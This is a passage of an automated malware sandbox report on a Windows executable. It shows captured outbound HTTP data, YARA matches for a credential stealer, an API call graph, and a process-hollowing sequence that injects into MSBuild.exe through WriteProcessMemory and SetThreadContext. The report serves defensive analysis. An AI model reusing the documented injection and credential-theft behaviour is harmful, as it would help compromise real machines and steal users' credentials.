                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 01 d8 85 06 71 20 34 1b 31 9e f8 37 94 c7 f3 81 8f 29 1d e1 58 d3 a5 5c c8 35 86 5a 25 4a dd 25 58 54 c7 c3 b8 e5 93 4d f8 18 be 7c 1c d5 7d 7d fa ae e9 70 62 10 92 a7 d1 9c 75 f3 9a 4c 4b 54 61 42 10 e2 24 63 cc 93 59 74 36 a1 2d 80 b4 f1 2b 2f ad 4b 73 17 a1 f1 b7 65 e9 a7 a1 a8 45 b5 d7 1c 31 ce be a5 38 b9 f4 79 1a 22 3e 6b c4 32 cf cb 23 6f d4 bc 06 85 c3 2d 78 f6 2a 35 e6 75 70 bb 25 89 04 42 08 07 82 9d 97 24 66 a2 32 df 32 7b a0 a2 17 0d ea 88 53 fd 19 a7 05 16 f6 89 ab 8b c7 fc 44 e2 06 65 e5 87 a2 56 fb 0f 78 be c3 9a 2a 10 95 5c 23 e3 23 df f1 0d 57 80 f4 25 db 34 49 a1 96 a2 97 ed 5b 3c 80 1d cc 37 e8 14 9b 0c 6f 6d 12 a5 92 67 d6 ce 80 b6 43 d8 5a 2e c9 f8 d5 d8 88 c7 e2 5a f4 62 2a 48 3f 89 a7 19 a3 97 6c 04 4d 0f f3 1d df 8b 5e 6a 4d d2 54
                                                                                                                                                                                                                                      Data Ascii: q 417)X\5Z%J%XTM|}}pbuLKTaB$cYt6-+/KseE18y">k2#o-x*5up%B$f22{SDeVx*\##W%4I[<7omgCZ.Zb*H?lM^jMT
                                                                                                                                                                                                                                      2024-12-18 10:33:24 UTC15331OUTData Raw: 04 ff 0b 48 8a 8f 42 0e 85 fd 3c 64 3c ff d3 5f 33 16 be 77 98 c0 30 00 74 3f 55 86 13 92 2c 04 79 19 7e de ee 12 13 7e a2 c6 9b 71 0d 03 4b ff 0d ae 3e 89 41 63 eb ee 77 31 1c f5 82 85 80 cb be 58 2d d4 5b 42 69 57 bc 24 d1 08 b1 65 73 e6 75 ee e5 9c 56 48 13 49 7d a5 18 ad e1 43 58 d6 e0 6f 36 20 2d 68 ae 8e 50 24 30 34 40 6c ef 2c a9 1a 32 14 c3 77 6f ff 77 df fa 72 d3 ca ec 36 9e 1a 18 35 a1 3f 34 58 c1 b1 b7 d3 e9 27 01 71 7f ec c2 95 61 fc c6 12 df 5a 05 03 7e 4a 8a 25 78 03 04 ea df 3d 67 40 e7 2e fc fe f0 9f 72 b2 8f eb 56 35 c9 08 b2 11 b2 7c 14 f9 bb 9f 24 1d eb 44 2c 00 c4 dd c2 23 ee a2 4b 78 9e 92 e1 32 17 b7 e1 6f a5 e9 a4 10 73 02 92 6d b8 18 1a fa 44 f8 3f 32 8a b5 37 e6 b2 84 55 ea b0 9d 89 7a 6c 84 11 d6 81 9f b0 fd cc 7f 23 4e 31 de 96
                                                                                                                                                                                                                                      Data Ascii: HB<d<_3w0t?U,y~~qK>Acw1X-[BiW$esuVHI}CXo6 -hP$04@l,2wowr65?4X'qaZ~J%x=g@.rV5|$D,#Kx2osmD?27Uzl#N1
                                                                                                                                                                                                                                      2024-12-18 10:33:29 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 10:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=o4r2qn6km6pb24l5jfiq1h2dgh; expires=Sun, 13-Apr-2025 04:20:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2zMQt0F%2BTJWakysuazLHD0WRpnhnCdbFnAjHCeJN6lH51U3ycSGuP66EylcFIVqhvc%2F2gpt%2Fz9zxOYjeDiKgpvp4ClAqGh%2FGnku8flGdaKo6EBmzIJOhZfp0kUXtGDWC5o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3e7e988d62435e-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2353&min_rtt=2352&rtt_var=883&sent=304&recv=591&lost=0&retrans=0&sent_bytes=2835&recv_bytes=571602&delivery_rate=1241496&cwnd=240&unsent_bytes=0&cid=dd485b837f94812f&ts=4940&x=0"


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:05:32:55
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\1fxm3u0d.exe"
                                                                                                                                                                                                                                      Imagebase:0x170000
                                                                                                                                                                                                                                      File size:644'096 bytes
                                                                                                                                                                                                                                      MD5 hash:2CA092D4C58D496D25E1238185D31B6E
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                      Start time:05:32:55
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:05:32:57
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\1fxm3u0d.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\1fxm3u0d.exe"
                                                                                                                                                                                                                                      Imagebase:0x170000
                                                                                                                                                                                                                                      File size:644'096 bytes
                                                                                                                                                                                                                                      MD5 hash:2CA092D4C58D496D25E1238185D31B6E
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2283579467.000000000340F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2280589839.0000000003405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2280756454.0000000003405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:05:32:57
                                                                                                                                                                                                                                      Start date:18/12/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 304
                                                                                                                                                                                                                                      Imagebase:0xd30000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:6.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:2.1%
                                                                                                                                                                                                                                        Signature Coverage:33.3%
                                                                                                                                                                                                                                        Total number of Nodes:381
                                                                                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                                                                                        execution_graph 23231 191810 41 API calls 23232 190210 66 API calls 23313 195310 73 API calls 2 library calls 23314 1a1311 34 API calls 2 library calls 23315 18c114 14 API calls ___std_exception_destroy 23233 18e800 82 API calls std::ios_base::_Init 23234 18f000 16 API calls 2 library calls 22818 191d02 22819 191d0e __FrameHandler3::FrameUnwindToState 22818->22819 22844 18ebf1 22819->22844 22821 191d15 22822 191e6e 22821->22822 22832 191d3f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 22821->22832 22880 190f5b 4 API calls 2 library calls 22822->22880 22824 191e75 22881 197d0d 21 API calls CallUnexpected 22824->22881 22826 191e7b 22882 197d23 21 API calls CallUnexpected 22826->22882 22828 191e83 22829 191d5e 22830 191ddf 22855 19a2b6 59 API calls 22830->22855 22832->22829 22832->22830 22876 197d57 39 API calls 4 library calls 22832->22876 22834 191de5 22856 1741b0 22834->22856 22838 191e06 22838->22824 22839 191e0a 22838->22839 22840 191e13 22839->22840 22878 197d39 21 API calls CallUnexpected 22839->22878 22879 18ec2a 75 API calls ___scrt_uninitialize_crt 22840->22879 22843 191e1c 22843->22829 22845 18ebfa 22844->22845 22883 1910d6 IsProcessorFeaturePresent 22845->22883 22847 18ec06 22884 1926bf 10 API calls 2 library calls 22847->22884 22849 18ec0b 22850 18ec0f 22849->22850 22885 195130 22849->22885 22850->22821 22853 18ec26 22853->22821 22855->22834 22857 174220 22856->22857 22875 174235 _Yarn _strlen 22857->22875 22925 177140 30 API calls 3 library calls 22857->22925 22859 17454c 22927 176f00 29 API calls 2 library calls 22859->22927 22860 199f54 67 API calls 22860->22875 22861 175670 29 API calls std::_Throw_Cpp_error 22861->22875 22863 175c90 30 API calls std::ios_base::_Init 22863->22875 22866 19b9bd 36 API calls 22866->22875 22867 174bb0 22870 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22867->22870 22868 19ac8e 69 API calls 22868->22875 22871 174bc2 22870->22871 22877 190f08 GetModuleHandleW 22871->22877 22872 19b2f6 92 API calls 22872->22875 22873 175960 5 API calls std::_Throw_Cpp_error 22873->22875 22874 19b677 45 API calls __fread_nolock 22874->22875 22875->22859 22875->22860 22875->22861 22875->22863 22875->22866 22875->22868 22875->22872 22875->22873 22875->22874 22898 173d40 GetPEB 22875->22898 22912 174bd0 22875->22912 22926 172de0 30 API calls 2 library calls 22875->22926 22876->22830 22877->22838 22878->22840 22879->22843 22880->22824 22881->22826 22882->22828 22883->22847 22884->22849 22889 1a1cf9 22885->22889 22888 1926de 7 API calls 2 library calls 22888->22850 22890 1a1d09 22889->22890 22891 18ec18 22889->22891 22890->22891 22893 1a1462 22890->22893 22891->22853 22891->22888 22894 1a1469 22893->22894 22895 1a14ac GetStdHandle 22894->22895 22896 1a150e 22894->22896 22897 1a14bf GetFileType 22894->22897 22895->22894 22896->22890 22897->22894 22928 173560 22898->22928 22902 173dd5 22903 171000 77 API calls 22902->22903 22906 173de6 22903->22906 22904 173560 30 API calls 22904->22906 22905 173f56 22905->22875 22906->22904 22906->22905 22907 173f38 22906->22907 22908 173ef2 TranslateMessage 22906->22908 22909 173e0b TranslateMessage 22906->22909 22910 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22907->22910 22908->22906 22909->22906 22911 17419c 22910->22911 22911->22875 23119 1795f0 22912->23119 22914 175402 23135 18b600 22914->23135 22916 1797e0 67 API calls 22920 174c01 22916->22920 22917 175558 22921 1755b5 22917->22921 23149 18e340 44 API calls 2 library calls 22917->23149 22918 179a30 5 API calls std::ios_base::_Ios_base_dtor 22918->22920 22920->22914 22920->22916 22920->22918 23125 17ead0 22920->23125 22922 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22921->22922 22923 175623 22922->22923 22923->22875 22925->22857 22926->22875 22927->22867 22935 1735bb _strlen 22928->22935 22929 1736e1 22930 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22929->22930 22933 173d34 FreeConsole 22930->22933 22931 175670 29 API calls std::_Throw_Cpp_error 22931->22935 22936 171000 22933->22936 22935->22929 22935->22931 22953 175c90 22935->22953 22960 172de0 30 API calls 2 library calls 22935->22960 22950 171050 22936->22950 22937 17246c 22985 176f00 29 API calls 2 library calls 22937->22985 22942 172750 34 API calls 22942->22950 22943 172475 22944 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22943->22944 22946 17248f 22944->22946 22946->22902 22947 178780 29 API calls 22947->22950 22950->22937 22950->22942 22950->22947 22952 17123c 22950->22952 22963 18e85c 22950->22963 22974 1724a0 22950->22974 22980 177e80 30 API calls 3 library calls 22950->22980 22981 177140 30 API calls 3 library calls 22950->22981 22982 178a00 30 API calls 3 library calls 22950->22982 22983 172500 39 API calls 2 library calls 22950->22983 22984 176f00 29 API calls 2 library calls 22950->22984 22952->22902 22954 175cd8 _Yarn 22953->22954 22955 176074 22954->22955 22961 176090 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 22954->22961 22962 176410 30 API calls 4 library calls 22954->22962 22958 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22955->22958 22959 17607e 22958->22959 22959->22935 22960->22935 22961->22954 22962->22954 22965 18e861 _Yarn 22963->22965 22964 18e87b 22964->22950 22965->22964 22967 18e87d 22965->22967 22986 19803f EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 22965->22986 22968 190ce6 std::ios_base::_Init 22967->22968 22969 18e887 Concurrency::cancel_current_task 22967->22969 22988 191ffc RaiseException 22968->22988 22987 191ffc RaiseException 22969->22987 22972 190d02 22973 18f3b1 22975 1724c3 _Fputc 22974->22975 22989 195458 22975->22989 22977 1724dc 22978 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22977->22978 22979 1724ec 22978->22979 22979->22950 22980->22950 22981->22950 22982->22950 22983->22950 22984->22950 22985->22943 22986->22965 22987->22973 22988->22972 22990 19546c _Fputc 22989->22990 22991 19548e 22990->22991 22993 1954b5 22990->22993 23004 19a772 29 API calls 2 library calls 22991->23004 22996 196ef8 22993->22996 22995 1954a9 _Fputc 22995->22977 22997 196f04 __FrameHandler3::FrameUnwindToState 22996->22997 23005 195215 EnterCriticalSection 22997->23005 22999 196f12 23006 1966c1 22999->23006 23003 196f30 23003->22995 23004->22995 23005->22999 23018 1a209b 23006->23018 23008 1966e8 23025 195b10 23008->23025 23015 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23016 19675b 23015->23016 23017 196f47 LeaveCriticalSection __fread_nolock 23016->23017 23017->23003 23048 1a2146 23018->23048 23020 1a20ac _Fputc 23021 1a210e 23020->23021 23055 19f9b9 23020->23055 23021->23008 23087 195a72 23025->23087 23028 195b5e std::_Locinfo::_Locinfo_ctor 23031 195b53 23028->23031 23036 1959d1 66 API calls 23028->23036 23037 195d52 23028->23037 23094 1956d0 39 API calls std::_Locinfo::_Locinfo_ctor 23028->23094 23095 195dc0 29 API calls 23028->23095 23096 195e38 70 API calls 2 library calls 23028->23096 23097 195f91 70 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23028->23097 23029 195b36 23093 19a772 29 API calls 2 library calls 23029->23093 23041 1957a1 23031->23041 23036->23028 23098 19a772 29 API calls 2 library calls 23037->23098 23039 195d6c 23099 19a772 29 API calls 2 library calls 23039->23099 23042 19f97f ___free_lconv_mon 14 API calls 23041->23042 23043 1957b1 23042->23043 23044 1a2184 23043->23044 23045 1a218f 23044->23045 23047 196749 23044->23047 23045->23047 23102 19aea4 23045->23102 23047->23015 23049 1a2152 _Fputc 23048->23049 23050 1a217c 23049->23050 23068 1a30a3 23049->23068 23050->23020 23052 1a216d 23075 1ab1ef 23052->23075 23054 1a2173 23054->23020 23056 19f9f7 23055->23056 23060 19f9c7 __dosmaperr 23055->23060 23085 199ea4 14 API calls __dosmaperr 23056->23085 23057 19f9e2 RtlAllocateHeap 23059 19f9f5 23057->23059 23057->23060 23062 19f97f 23059->23062 23060->23056 23060->23057 23084 19803f EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 23060->23084 23063 19f98a HeapFree 23062->23063 23064 19f9b4 23062->23064 23063->23064 23065 19f99f GetLastError 23063->23065 23064->23021 23066 19f9ac __dosmaperr 23065->23066 23086 199ea4 14 API calls __dosmaperr 23066->23086 23069 1a30af 23068->23069 23070 1a30c4 23068->23070 23071 199ea4 __dosmaperr 14 API calls 23069->23071 23070->23052 23072 1a30b4 23071->23072 23073 19a5c9 __wsopen_s 29 API calls 23072->23073 23074 1a30bf 23073->23074 23074->23052 23076 1ab209 23075->23076 23077 1ab1fc 23075->23077 23080 1ab215 23076->23080 23081 199ea4 __dosmaperr 14 API calls 23076->23081 23078 199ea4 __dosmaperr 14 API calls 23077->23078 23079 1ab201 23078->23079 23079->23054 23080->23054 23082 1ab236 23081->23082 23083 19a5c9 __wsopen_s 29 API calls 23082->23083 23083->23079 23084->23060 23085->23059 23086->23064 23088 195a7d 23087->23088 23089 195a9f 23087->23089 23100 19a772 29 API calls 2 library calls 23088->23100 23101 19553d 29 API calls 3 library calls 23089->23101 23092 195a98 23092->23028 23092->23029 23092->23031 23093->23031 23094->23028 23095->23028 23096->23028 23097->23028 23098->23039 23099->23031 23100->23092 23101->23092 23103 19aebd 23102->23103 23104 19aee4 23102->23104 23103->23104 23105 1a30a3 __fread_nolock 29 API calls 23103->23105 23104->23047 23106 19aed9 23105->23106 23108 1a7472 23106->23108 23111 1a747e __FrameHandler3::FrameUnwindToState 23108->23111 23109 1a7486 23109->23104 23110 1a74bf 23112 19a772 _Fputc 29 API calls 23110->23112 23111->23109 23111->23110 23113 1a7505 23111->23113 23112->23109 23114 1a6d35 __fread_nolock EnterCriticalSection 23113->23114 23115 1a750b 23114->23115 23116 1a7529 23115->23116 23117 1a7256 __wsopen_s 62 API calls 23115->23117 23118 1a757b __wsopen_s LeaveCriticalSection 23116->23118 23117->23116 23118->23109 23120 179630 23119->23120 23122 179782 23120->23122 23150 179c40 44 API calls 2 library calls 23120->23150 23123 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23122->23123 23124 1797c8 23123->23124 23124->22920 23126 17eb60 23125->23126 23151 18a720 23126->23151 23132 17ec6a 23133 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23132->23133 23134 17ec78 23133->23134 23134->22920 23136 18b740 23135->23136 23137 18b900 23136->23137 23140 18b8cb 23136->23140 23141 18b8db 23136->23141 23138 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23137->23138 23139 18b90b 23138->23139 23139->22917 23219 191ffc RaiseException 23140->23219 23216 18b920 43 API calls 4 library calls 23141->23216 23144 18b8e5 23217 18ba20 30 API calls 4 library calls 23144->23217 23145 18b91e 23147 18b8f5 23218 191ffc RaiseException 23147->23218 23149->22917 23150->23120 23152 18a827 23151->23152 23153 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23152->23153 23154 17ec12 23153->23154 23155 182650 23154->23155 23156 18267a 23155->23156 23185 1954fc 23156->23185 23158 18268a 23159 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23158->23159 23160 17ec25 23159->23160 23161 17fe40 23160->23161 23183 17fe89 23161->23183 23162 1820d5 23207 176090 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23162->23207 23164 176090 5 API calls std::ios_base::_Init 23164->23183 23166 1818e3 23166->23132 23167 1820ed 23171 182184 23167->23171 23208 1867b0 23167->23208 23169 1867b0 69 API calls 23169->23183 23172 1867b0 69 API calls 23171->23172 23178 182226 23171->23178 23172->23171 23173 179a30 5 API calls std::ios_base::_Ios_base_dtor 23173->23183 23175 1844b0 30 API calls 23175->23183 23176 182603 23179 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23176->23179 23181 18241d 23178->23181 23214 175670 29 API calls 3 library calls 23178->23214 23180 18263b 23179->23180 23180->23132 23181->23176 23215 175670 29 API calls 3 library calls 23181->23215 23183->23162 23183->23164 23183->23166 23183->23169 23183->23173 23183->23175 23200 1826b0 67 API calls 4 library calls 23183->23200 23201 182e40 30 API calls 4 library calls 23183->23201 23202 182a70 67 API calls 4 library calls 23183->23202 23203 175960 23183->23203 23186 195510 _Fputc 23185->23186 23189 1958cb 23186->23189 23188 19552b _Fputc 23188->23158 23190 1958fa 23189->23190 23191 1958d7 23189->23191 23195 195921 23190->23195 23198 1967f5 44 API calls 2 library calls 23190->23198 23197 19a772 29 API calls 2 library calls 23191->23197 23196 1958f2 23195->23196 23199 19a772 29 API calls 2 library calls 23195->23199 23196->23188 23197->23196 23198->23195 23199->23196 23200->23183 23201->23183 23202->23183 23204 175987 23203->23204 23205 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23204->23205 23206 175c7e 23205->23206 23206->23183 23207->23167 23209 1867f7 23208->23209 23210 186956 23209->23210 23211 186a20 69 API calls 23209->23211 23212 18e8c8 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23210->23212 23211->23209 23213 186a15 23212->23213 23213->23167 23214->23178 23215->23181 23216->23144 23217->23147 23218->23137 23219->23145 23237 191e3d 21 API calls CallUnexpected 23240 194631 20 API calls 23241 191c30 71 API calls 2 library calls 23323 1a3130 43 API calls 2 library calls 23326 18f120 9 API calls 3 library calls 23246 176c50 29 API calls ___std_exception_copy 23249 19a850 7 API calls __wsopen_s 23332 192350 52 API calls 2 library calls 23334 18534f 66 API calls 3 library calls 23335 18fd40 46 API calls 2 library calls 23256 195240 15 API calls 3 library calls 23337 192740 40 API calls 5 library calls 23263 19e670 15 API calls 23341 195370 GetCommandLineA GetCommandLineW 23342 191373 DecodePointer 23344 176d60 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23264 18fc60 31 API calls 23348 18e760 33 API calls std::ios_base::_Init 23266 190260 68 API calls 23268 19e660 IsProcessorFeaturePresent 23220 174c1a 110 API calls 3 library calls 23350 18ed9a DeleteCriticalSection 23271 17ec90 94 API calls 3 library calls 23273 191e90 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 23352 194b90 47 API calls 4 library calls 23358 18e780 32 API calls std::ios_base::_Init 23276 191080 49 API calls _unexpected 23277 190480 72 API calls messages 23361 1a1380 15 API calls 23362 17bfb0 97 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23282 183eb0 48 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23283 1900b0 70 API calls 23284 1950b0 7 API calls ___scrt_uninitialize_crt 23221 1be1b4 23225 1be1ea 23221->23225 23222 1be337 GetPEB 23223 1be349 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 23222->23223 23224 1be3f0 WriteProcessMemory 23223->23224 23223->23225 23226 1be435 23224->23226 23225->23222 23225->23223 23227 1be43a WriteProcessMemory 23226->23227 23228 1be477 WriteProcessMemory Wow64SetThreadContext ResumeThread 23226->23228 23227->23226 22792 173e04 32 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23286 1926ab 8 API calls 23287 1902a0 67 API calls 23367 1a51a0 42 API calls 3 library calls 23289 176cd0 19 API calls 2 library calls 23293 18fed0 45 API calls 2 library calls 23371 19fbd0 16 API calls __dosmaperr 23294 1a18d0 LeaveCriticalSection std::_Lockit::~_Lockit 23372 197fce 39 API calls _unexpected 23373 18ffc0 69 API calls _Yarn 23374 18e7c0 47 API calls 2 library calls 23299 1a52c0 41 API calls 3 library calls 23300 1a04c0 FreeLibrary 22793 1769f0 22796 176a3b 22793->22796 22794 18e85c RaiseException EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 22794->22796 22795 176a70 22808 18e8c8 22795->22808 22796->22794 22796->22795 22799 176bd6 22796->22799 22801 176b54 22796->22801 22798 176bcc 22815 176be0 30 API calls 2 library calls 22799->22815 22816 19a5d9 29 API calls 2 library calls 22801->22816 22809 18e8d0 22808->22809 22810 18e8d1 IsProcessorFeaturePresent 22808->22810 22809->22798 22812 190df3 22810->22812 22817 190ed8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22812->22817 22814 190ed6 22814->22798 22815->22801 22817->22814 23304 191cf0 30 API calls 23305 1a12f0 GetProcessHeap 23377 1959f3 66 API calls 23378 1a45f0 41 API calls 3 library calls 23308 18e8e0 44 API calls std::ios_base::_Init 23309 185ee0 30 API calls 2 library calls 23311 1a4ee0 44 API calls 3 library calls 23382 1ab1e0 49 API calls

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,001BE126,001BE116), ref: 001BE34A
                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001BE35D
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(000000A0,00000000), ref: 001BE37B
                                                                                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(0000009C,?,001BE16A,00000004,00000000), ref: 001BE39F
                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 001BE3CA
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 001BE422
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 001BE46D
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 001BE4AB
                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(000000A0,04620000), ref: 001BE4E7
                                                                                                                                                                                                                                        • ResumeThread.KERNELBASE(000000A0), ref: 001BE4F6
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                        • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                        • Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
                                                                                                                                                                                                                                        • Instruction ID: 0200f19ed69ddc880603cc13ceb72ff67bf446699d6bbb2fabd673a1bd363d82
